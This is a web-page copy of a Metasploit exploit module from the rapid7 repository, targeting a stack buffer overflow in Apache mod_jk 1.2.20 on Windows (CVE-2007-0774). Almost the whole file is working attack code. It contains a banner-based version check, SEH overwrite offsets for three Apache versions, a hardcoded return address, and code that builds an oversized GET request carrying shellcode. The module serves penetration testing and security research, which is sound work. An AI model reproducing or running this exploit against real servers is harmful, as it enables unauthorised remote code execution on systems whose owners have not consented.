Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/apache_modjk_overflow.rb
19719 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Apache mod_jk 1.2.20 Buffer Overflow',

17
        'Description' => %q{

18
          This is a stack buffer overflow exploit for mod_jk 1.2.20.

19
          Should work on any Win32 OS.

20
        },

21
        'Author' => 'Nicob <nicob[at]nicob.net>',

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2007-0774' ],

25
          [ 'OSVDB', '33855' ],

26
          [ 'BID', '22791' ],

27
          [ 'ZDI', '07-008' ]

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
        },

32
        'Privileged' => true,

33
        'Payload' => {

34
          'Space' => 4000,

35
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c",

36
          'DisableNops' => true

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          # POP/POP/RET in mod_jk 1.2.20 (Apache 1.3.37, 2.0.58 and 2.2.3)

41
          ['mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)', { 'Ret' => 0x6a6b8ef1 }],

42
        ],

43
        'DefaultTarget' => 0,

44
        'DisclosureDate' => '2007-03-02',

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        Opt::RPORT(80)

56
      ]

57
    )

58
  end

59


60
  def check

61
    connect

62


63
    sock.put("GET / HTTP/1.0\r\n\r\n")

64
    resp = sock.get_once

65
    disconnect

66


67
    if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1\.2\.20/))) then

68
      vprint_status("Apache version detected : #{m[1]}")

69
      return Exploit::CheckCode::Appears

70
    else

71
      return Exploit::CheckCode::Safe

72
    end

73
  end

74


75
  def exploit

76
    connect

77


78
    uri_start = "GET /"

79
    uri_end = ".html HTTP/1.0\r\n\r\n"

80
    sc_base = 16

81


82
    shellcode = payload.encoded

83
    sploit = rand_text_alphanumeric(5001)

84
    sploit[sc_base, shellcode.length] = shellcode

85


86
    # 4343 : Apache/1.3.37 (Win32) mod_jk/1.2.20

87
    # 4407 : Apache/2.0.59 (Win32) mod_jk/1.2.20

88
    # 4423 : Apache/2.2.3  (Win32) mod_jk/1.2.20

89


90
    [ 4343, 4407, 4423 ].each { |seh_offset|

91
      sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V')

92
      sploit[seh_offset - 4, 2] = "\xeb\xf9"

93
      sploit[seh_offset, 4] = [ target.ret ].pack('V')

94
    }

95


96
    print_status("Trying target #{target.name}...")

97
    sock.put(uri_start + sploit + uri_end)

98


99
    resp = sock.get_once

100
    if (resp and (m = resp.match(/<title>(.*)<\/title>/i)))

101
      print_error("The exploit failed : HTTP Status Code '#{m[1]}' received :-(")

102
    end

103


104
    handler

105
    disconnect

106
  end

107
end

108


109